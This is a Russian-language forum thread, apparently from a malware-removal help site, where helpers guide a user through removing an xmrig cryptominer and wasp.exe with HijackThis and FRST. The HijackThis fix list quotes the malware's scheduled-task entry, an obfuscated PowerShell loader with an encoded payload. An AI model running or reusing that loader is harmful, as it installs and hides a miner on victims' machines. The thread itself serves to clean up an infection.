Недавно обнаружил майнер xmrig и удалил его, но он восстановился и вместе с ним появился wasp.exe. Где 1-ый находится я знаю, а второй спрятался где-то в этой папке.
Недавно обнаружил майнер xmrig и удалил его, но он восстановился и вместе с ним появился wasp.exe. Где 1-ый находится я знаю, а второй спрятался где-то в этой папке.
Уважаемый(ая) [B]Pravoslavnyj_Ludoed[/B], спасибо за обращение на наш форум!
Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
Запустите HijackThis, расположенный в папке Autologger и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите только эти строки[/url]:[code]O22 - Task: \Microsoft\Windows\DiskCleanup\DiskCleanup - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "$smEtQ='v23EQs8z23nLMJYiyyKhV9pZzBGMTcoYnASYSsdfj2WeduYFpWbtLOkRnAGMcasQkRDaC7AkkELBVJ0R1VKlH5IZhByJX6dHuTDDN/w91WGOTbcC5nibFdgug2bsBJVMphWcXr8ViiCaH5AJwCjHJ6RSvyy2MaxX1lLNJqdJwkSXX9ZTgBOOFYVephWcXr8ViiKNAecM+malKbZD6WGYFJ1IqHycSMNZiDvZDZQNnzGdBIcijRSBAo0TnDfVd+sM+HGjJ+5PrROdZsQHnA6RX6l1mFveAsYAmh+QCdVUmEvMAuEZtDaKPctl71acE4gP4m6dSdFG3nb8XNwQmwDGI5wRnAWbM4cUjTHVY7cE7ne4K8cygROMcehOug+LFOhyjT3ASq4Chx2qEZsV3kS7BOAA53XQO+Jl7CmWApIF72nYMoEOjnD1T7EtxiOcAo0RhSKNEYwVmiLVY/kQpVP9d84EixCXevYFqhSXB+xt0UnTWcYijRGMJIc1hhTAWbtAqTrceqcirTOSVpIU9XXaSMMUnD3DCJYWtVSLFMhdhhXIQ9hCwXHVYrtdzHHsLs4AlgSXeaVNtAmLC+B1lEDLUMU9iQiBHZ0dyETTVPgDtEmLZ/5p9WOkO5UB+HWlW8IcmGawOpUDnBi1StIChwWGFMBDjT3bSucB/3zFOaYSkQ7QT+gBjQi4WLdF00jeA9lZwVnBS4EWwFSbQbJE5XfYIKV7v26TS8VCon6XDNpGh3D0Ep0ZzBqCW9VSxgSDUtMNzGuVLKgI/2DoObNO3AqSO+wOyE6VCv0/kF3eGcpLzALVK7sJmwSNHbwn7GbWROliyWGIFZ0T+EDCW7sPn3TsBNBGiRTBS8wCxjGEHIcHqX+FftgF733qZv8VxUSedekTnFvBEKNVigWIMY8VhgTVVJ0R01SaA+JUrWDWVOl0yWGKEJcO/3jQSMNZmXGlRYoRmF67BIkEnQOrH4wV02OXOdEJ5WDFJ/8F2E2WcaVTyVLMGeh4kBSHVJpNjBWLUMAruwmbBPcEp1GXffpl6XCkWsIm/nKVI5kOnyOsMowQgR6PWMAejQfFH4oajWmFMdkZ+GD9brIot06rYPcFmA23B+xknBLSVJoDmF6vFZwijQOYH/wa7EGMYelh9izQSdFO3niZBawSv3v8SdFLwVDAVIkUw1KdSYEFgmWafqhJsGnxZbRB1Q6XYKVEi0meB/VpjR3eAtUruwmbBI0dxiSNCOZHzHybfOhp9WOkWsI12FvAT78YjkbsE5EMj1jMAsFLzBHVWMwC1S6DP/kQ533sK75B2kzKPaw7yT3eRuI9yVuTFsBUiVDFFZlQ2VmTVP1UoXuda6wk6V/IPdFA8D23FIxQqWHqCJYFlRWEA40ZjljMEchdjXvRJqMbr2ylIb5a0C6dY6gvmwqAAfkgqhmJBI0dxiSAAo0RjBmGF7wk/Gada6Qk73aMBdRE/kbJPNQmiHD+PNwawVnGM4QfmxXAWdMZjiLVaaMbr3ulIaxDhQWUZ+Ab3Q/YQLwihB2fHJsVkxWQGZwNzB/VVP1H+meaYPhy8mqeSMhMrEarGIsJn3i2LJkWgC3SSqUZhljdQNhAxCrVfqQs7nr/d/RI0VvcZvZdnQWGQqVbqhmJBI0dxiSNCJxerR6LH/YA53WlKbZVz0LBTr8F+F+BFZ0O0jH3SNFCwFSBW8pGgwXdCZo7jzKWM6Nbr2brPscUigmlLr8ligOEEuhEmBSbI5wCgR6PWLMzhx6eFeAd1CjCR+NC+necVswz+G+RD59V3mfrSNFZzALVK7sJmwSNHcY+jX7fRu8C2XHpdvkSjD3CLsYSnAGRB6UkmATRUs4B1VLDVJoDwUvMArwo5X6XZM1172urBZwJ/nibFcVZnHT0Ep1ZzALGJZsVmjGPFYYE1S6EcLFE+TrocfMZgV3cZL5Ei06iB/lSnBOKH4YDjVjBDKcFnF2mBf4Fsg==';&('iQooeQoox'-replace'Qoo')('$d=([regex]::Matches(''pkyJpQGJocmbv9WUpJHdTdyKnQXZH5COGRVV6oTXn5Wav9WUk92Yv9WUuVkL0h3bvFVZU5SblR3bvF1c592bRN1WngCev9WUl92bRlGKgg3bvFVZv9WUptTKyVmYtVnbsFWayV2UuomYvRCIrAyJgcCIrACblR2bN5iai9GJoASKpEFdF12ckgyZulmc092bRNFNv9WU2U2ch92bRJUbv92bRJnR6oTX0JXZ252bD5SblR3c5N1WoAyYv9WUlRGI9ACZksjclJWb15Gbhl2bvFlclNFIswWZv9WUk9WTgQ3Yl92bRxWZzBCfg03JwUkVJJFRMF0bvF1QJNVWIBFXuwFXnAScl1CIElUZv9WUjlmdlRkLfRyegUmcv9WUlh2dgwHIlZXav9WUyR2av9WUzlGZfJzMv9WUul2bvF1dgkWb3dGI9Aiai92bR9GJ9tjYjRCIuJ3bvFVd0Vmc9tyKqRyOzRCIy9Gei1CIdpGJbJGckAicv92bRhnYtASXpRyWiNGJg0DIdlGJbJ2YkszckAicv92bRhnYtASKyUTMgI3bi1CIzRCIk52bvFVYi1CIzIDKg0DIzRCI9BTPqRyepQnb192QuIGckASZn1CIqRCKml2epsyKpRCI7Qnb192QuI2YkACds1CIpRCI7ADI9ASakgicv92bRZ2Ow0jaksTXwslYwRCI9AycksTKzNXYwRCKzV2bvFFd5JEdv9WUldkL4YEVVpjOddmbv9WUpR2bj5WRuQ3bvFFelRlLtV2bvFFdzl3UbBSPgI2bvFFcksXKzN3bvFVYwRSXn5Way92bRR3cbBCLi92bRNGJd11WlR3bvFVeitFKjV2bvFFZg42bpR3Yv9WUuVnZ'',''.'',''RiQooghQootTQoooLQooeft'')|FoQoorEaQooch {$Qoo_Qoo.valQooue}) -jQooo'+'in '''';$d=[TeQooxt.EncoQooding]::UTQooF'+2*2*2+'.GeQootString([ConQoovert]::Fro'+'mQooB'+'ase'+8*8+'StriQoong($Qood));&(''iQooeQoox'')($d -repQoolace''QQoooo'');'-replace'Qoo')"
O22 - Task: \Microsoft\Windows\Maintenance\WinDAT - C:\WINDOWS\system32\cmd.exe /c dlhosts.exe || dlchosts.exe[/code]
Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] или с [URL="https://www.geekstogo.com/forum/files/file/435-frst-farbar-recovery-scan-tool/"]зеркала[/URL] и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите [B]Да[/B] для соглашения с предупреждением.
Нажмите кнопку [B]Сканировать[/B].
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
Вот.
Выделите и скопируйте в буфер обмена следующий код:[CODE]Start::
CreateRestorePoint:
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
GroupPolicy\User: Ограничение ? <==== ВНИМАНИЕ
Task: {4134951F-7D2C-4812-8B30-6C3E099A1101} - \Microsoft\Windows\UNP\RunCampaignManager -> Нет файла <==== ВНИМАНИЕ
Folder: C:\ProgramData\Windows
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Нет файла
AlternateDataStreams: C:\ProgramData\TEMP:D8999815 [200]
FirewallRules: [UDP Query User{43194CE7-08F4-4D35-B012-9F9499604657}I:\sdi_rus\sdi_x64_r1909.exe] => (Block) I:\sdi_rus\sdi_x64_r1909.exe => Нет файла
FirewallRules: [TCP Query User{0020382B-4DF1-4414-9274-523949CC8D19}I:\sdi_rus\sdi_x64_r1909.exe] => (Block) I:\sdi_rus\sdi_x64_r1909.exe => Нет файла
Reboot:
End::[/CODE]Запустите FRST.EXE/FRST64.EXE, нажмите один раз [B]Исправить[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
Сообщите, что с проблемой.
Вроде решена.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.